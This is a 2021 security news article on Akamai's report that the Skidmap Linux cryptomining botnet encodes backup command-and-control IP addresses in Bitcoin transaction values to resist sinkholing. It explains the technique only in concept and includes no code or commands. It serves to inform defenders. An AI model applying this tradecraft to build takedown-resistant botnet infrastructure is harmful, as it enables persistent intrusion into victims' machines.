Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Vulnerabilities / Threats

2/24/2021
09:15 AM
Connect Directly
Twitter
LinkedIn
RSS
E-Mail
50%
50%

Botnet Uses Blockchain to Obfuscate Backup Command & Control Information

The tactic makes it much harder for defenders to take down botnets via sinkholing and other standard techniques, Akamai says.

The operator of a known botnet used for cryptocurrency mining has started using a relatively rare technique for maintaining persistence that, if more broadly adopted, could make botnet takedowns much harder to accomplish.

Researchers at Akamai recently observed the technique being used in infection attempts targeting customers of its security intelligence response team. In a new report, the company describes the tactic as involving the use of the Bitcoin blockchain to obfuscate configuration information pertaining to secondary command-and-control (C2) infrastructure for the botnet. The decentralized nature of the blockchain makes the botnet infrastructure more reliable and harder to sinkhole, Akamai says.

Related Content:

Intl. Law Enforcement Operation Disrupts Emotet Botnet

Special Report: 2020 State of Cybersecurity Operations and Incident Response

New From The Edge: Security + Fraud Protection: Your One-Two Punch Against Cyberattacks

"The primary goal is to be able to recover from offensive actions taken against the botnet," says Akamai researcher Evyatar Saias. The operators want to ensure that if domains are seized or IP addresses are null routed, they have an out-of-band method for communicating information that point infected systems to new C2 servers, he says. "They leverage the blockchain to do that because it is decentralized and won't be taken down," Saias says.

The cryptocurrency-mining botnet malware that Akamai observed using the new technique is associated with a campaign called "Skidmap" that targets Linux machines, which Trend Micro first reported in September 2019. The malware exploits publicly known remote code execution vulnerabilities in technologies such as Hadoop YARN and Elasticsearch.

Once installed on a vulnerable system, it uses "cron job," a utility for executing tasks on a specific schedule, to check in with its C2 servers and keep reinfecting compromised systems with the latest version of the malware. To ensure resilience against takedown attempts, the operators of the botnet — like their peers — have established a mechanism with which infected systems automatically download a new version of the malware that is configured to use new domains and infrastructure if the primary one is taken down.

In December 2020, Akamai researchers observed a new version of the botnet malware that took the persistence mechanism up a notch. Akamai discovered the malware featuring a Bitcoin wallet address; a URL for an API for fetching data from the wallet; and several cryptic one-liners in the Bash programming language. The company's analysis of the new additions showed that the data the API was fetching from the Bitcoin wallet was being used to calculate an IP address that the malware can use for persistence and reinfections if the primary C2 infrastructure gets sinkholed.

Hiding in the Blockchain
"They're hiding IP addresses in the values of Bitcoin transactions," Saias says. As an analogy of how the system works, he points to a situation in which an individual might want to obfuscate the phone number at which they want someone else to call them. "Let's say I wanted you to call me, but I wanted to make it hard for others to know which phone number I wanted you to call me at," he says. "We could negotiate a system that says when I want you to call me, I'll wire five small deposits, all under a dollar, into your checking account."

 

The deposit amounts would map to the phone number to be dialed. For example, if the amounts of the five deposits were of $0.55, $0.51, $0.23, $0.45, and $0.67, respectively, the phone number to be dialed would be 555-123-4567, he says. If that phone number were to be disconnected, all that the other person would need to do to find the new number is look at their checking account after more small deposits are made.

The primary difference between the blockchain approach and other approaches is that usually there is a central authority overseeing the storage and dissemination of C2 information. Since blockchains are decentralized by design, they are resistant to centralized attempts to censor or remove data, Saias says. So, while a command-and-control bot on a social media platform, for example, might be easy to shut down, a wallet operating on a blockchain is considerably harder to neutralize.

"You would need to effectively ban the wallet from inquiries on public blockchain explorer platforms — of which there are many," he says. In the time it would take to coordinate such an effort — even if it were possible — that attacker could simply use another wallet address.

According to Saias, though they have been reports of others using a similar tactic, this is the first time that Akamai has directly observed the use of the blockchain for obfuscating backup IP address information.

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year ... View Full Bio
 

Recommended Reading:

Comment  | 
Print  | 
More Insights
Comments
Newest First  |  Oldest First  |  Threaded View
News
A Startup With NSA Roots Wants Silently Disarming Cyberattacks on the Wire to Become the Norm
Kelly Jackson Higgins, Executive Editor at Dark Reading,  5/11/2021
Edge-DRsplash-10-edge-articles
Cybersecurity: What Is Truly Essential?
Joshua Goldfarb, Director of Product Management at F5,  5/12/2021
Commentary
3 Cybersecurity Myths to Bust
Etay Maor, Sr. Director Security Strategy at Cato Networks,  5/11/2021
Register for Dark Reading Newsletters
White Papers
Video
Cartoon Contest
Current Issue
2021 Top Enterprise IT Trends
We've identified the key trends that are poised to impact the IT landscape in 2021. Find out why they're important and how they will affect you today!
Flash Poll
How Enterprises are Developing Secure Applications
How Enterprises are Developing Secure Applications
Recent breaches of third-party apps are driving many organizations to think harder about the security of their off-the-shelf software as they continue to move left in secure software development practices.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2020-19924
PUBLISHED: 2021-05-18
In Boostnote 0.12.1, exporting to PDF contains opportunities for XSS attacks.
CVE-2020-20220
PUBLISHED: 2021-05-18
Mikrotik RouterOs prior to stable 6.47 suffers from a memory corruption vulnerability in the /nova/bin/bfd process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference).
CVE-2020-20227
PUBLISHED: 2021-05-18
Mikrotik RouterOs stable 6.47 suffers from a memory corruption vulnerability in the /nova/bin/diskd process. An authenticated remote attacker can cause a Denial of Service due to invalid memory access.
CVE-2020-20245
PUBLISHED: 2021-05-18
Mikrotik RouterOs stable 6.46.3 suffers from a memory corruption vulnerability in the log process. An authenticated remote attacker can cause a Denial of Service due to improper memory access.
CVE-2020-20246
PUBLISHED: 2021-05-18
Mikrotik RouterOs stable 6.46.3 suffers from a memory corruption vulnerability in the mactel process. An authenticated remote attacker can cause a Denial of Service due to improper memory access.